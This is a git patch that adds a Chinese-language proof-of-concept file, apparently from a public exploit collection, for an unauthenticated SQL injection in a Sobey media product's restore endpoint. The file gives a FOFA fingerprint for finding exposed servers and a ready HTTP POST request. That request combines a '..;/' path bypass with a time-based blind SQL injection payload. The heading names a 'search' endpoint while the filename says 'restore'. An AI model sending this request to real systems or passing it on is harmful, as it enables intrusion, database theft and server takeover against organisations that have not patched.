From 8fe8bfe5c426d967c39ac1fdd527d2ae977a1da2 Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 1 Sep 2025 15:24:26 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E7=B4=A2=E8=B4=9D=E8=9E=8D=E5=AA=92?=
 =?UTF-8?q?=E4=BD=93restore=20=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../索贝融媒体restore 存在SQL注入漏洞.md      | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/wpoc/成都索贝数码科技/索贝融媒体restore 存在SQL注入漏洞.md b/wpoc/成都索贝数码科技/索贝融媒体restore 存在SQL注入漏洞.md
index 8b13789..902abe4 100644
--- a/wpoc/成都索贝数码科技/索贝融媒体restore 存在SQL注入漏洞.md	
+++ b/wpoc/成都索贝数码科技/索贝融媒体restore 存在SQL注入漏洞.md	
@@ -1 +1,20 @@
+# 索贝融媒体search存在SQL注入漏洞
 
+索贝融媒体产品是成都索贝数码科技股份有限公司（简称索贝）为各级电视台和媒体机构打造的一套集互联网和电视融合生产的解决方案。索贝融媒体 mch/WXArticleInt/restore 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+icon_hash="689611853"
+```
+
+## poc
+
+```javascript
+POST /sobey-mchEditor/js/..;/mch/WXArticleInt/restore HTTP/1.1
+Host: example.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 78
+
+siteCode=&id=1+AND+%28SELECT+2804+FROM+%28SELECT%28SLEEP%285%29%29%29MDfc%29&token=
+```